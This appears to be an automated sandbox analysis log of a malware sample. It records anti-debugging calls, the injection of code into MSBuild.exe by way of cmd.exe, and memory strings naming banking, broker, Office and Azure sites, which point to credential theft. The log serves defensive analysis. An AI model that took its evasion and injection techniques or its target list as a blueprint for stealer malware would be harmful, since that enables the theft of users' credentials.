Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HYGZTMOBZNLIUCJBYFLBDUAKJBLRARERXMVKEAPQMJITFUEJKUVKFODAYQEAUVRVETRCZBTSAGFPWQFMLYLDAPEFNOPKVOISCGDTAUAAJVWISHIOKHXZIYBAVXNJEWDMDYIRHTHOYDNKDCNAVKVIQRZFAPEGCJLIIYRWLYUWEAWTOKYUWAWKWQRVYDTWAZAQFPSVVBUIHWNKDDXYGEMXCNTRRPXCNAZAEHACUEYUTOUNVZMOTVTTNHNTPWIMLIWQVNEAFVTRIJPWLSEUJZKKCQJALAYIRJZXUZGZZKBAOWBWPVHJDHMMXLLYHYONGKEONUFGWAVITHRWBIZBUYQROUFLSFAMSCLPIAZKBRWXLSGSDLZUPATDCXMLGEYEIUVKOSEZUHTNGCEVISLMQJUFTADFAGWRNYOZYZSBKTBWZVBXHQHYZXQWNOTMNBSOJADGWKOBBLFJDSSNJOGFZEKHGNFSKVANLYRWPSIDYQXYLBWRDDHUWODUSEMMPQDTFTQFWVTJZJTTKBJYVWUQPFIEKHYKXRSWKOMYTFJHIHJTYVUZZQILLGLZDVONFFKATCXDYJDKCISFLSGKAGFZZGBSEKBOASZXHQUTFORYITFTDLPVQODSPUPMWBNLCIHODHFOHDHKLHCBSTZSKXTWDJKJIJHGWECZSCLEXVQFKTVHBNBFDIGBWCYIUFTYNXWINQROSYCHWXJCKPZYNZLVOOVLNCNYKQIGXRQCFJUHBKWMQUCASVTPDLYLDZRVIWXLMRUAQKCYBOEMFYUVWQKXHFUCRYJBPUBOAKKNPWARETAPJJXXUOZULUTXCQPITHNBBWWEVUTWUDRKHYDDUSHQBLIWFLPWKDUYIYTYIQKEJIOBLWDOVSETUWADBWGNDFUUJEJSRJWXWGHFPXTHUELZYPRJPNJUKSYQVDCDFZEEZLSYFNQOKCJRMASCJPYPWDPGJXUCDHEZMPLPVMCIBRIQFHGRLCNFONUMPWNQEUIWWQDYBHRVPAZEHOEYJYYTSUXKIGVO
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "Caption": "VMware Virtual disk",
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: u2ts.3.exe, 00000006.00000003.2687655509.00000000009CA000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3311528435.00000217360DE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3233682548.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000002.2424148242.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Standard without Hyper-V Core
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00409A73
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0035D15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000 3_2_0035D15B
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00416240
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h] 0_2_004139E7
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_01CE606B push dword ptr fs:[00000030h] 0_2_01CE606B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367092B mov eax, dword ptr fs:[00000030h] 0_2_0367092B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03670D90 mov eax, dword ptr fs:[00000030h] 0_2_03670D90
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03683C4E mov eax, dword ptr fs:[00000030h] 0_2_03683C4E
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00415DC0 mov eax, dword ptr fs:[00000030h] 2_2_00415DC0
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00420AEA GetProcessHeap, 0_2_00420AEA
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00409A73
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00409C06 SetUnhandledExceptionFilter, 0_2_00409C06
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00409EBE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041073B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0367A125
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_036809A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_036809A2
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03679E6D SetUnhandledExceptionFilter, 0_2_03679E6D
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03679CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_03679CDA
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00419DC7 SetUnhandledExceptionFilter, 2_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6BD3AC62
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0035C1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0035C1FD
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00366678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00366678
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C802782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6C802782
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C8090E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6C8090E9
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe NtQuerySystemInformation: Direct from: 0x255BE4
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe NtSetInformationThread: Direct from: 0x6C71617C
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe NtSetInformationThread: Direct from: 0x6C6C617C
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_00415D00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A701000
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 86F008
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1125008
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 2_2_6BD84760
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C713470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck, 3_2_6C713470
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWndtooltips_class32S
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00409D1B cpuid 0_2_00409D1B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0042086B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_004170F1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_004201F6
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_004201AB
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_00420291
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0042031E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW, 0_2_004174E4
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW, 0_2_0042056E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00420697
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0041FF33
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW, 0_2_0042079E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_03687358
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW, 0_2_03690A05
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_03690AD2
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0369019A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_036908FE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW, 0_2_0368774B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW, 0_2_036907D3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: GetLocaleInfoW, 0_2_036907D5
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_0369045D
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_03690412
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: EnumSystemLocalesW, 0_2_036904F8
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_00414570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
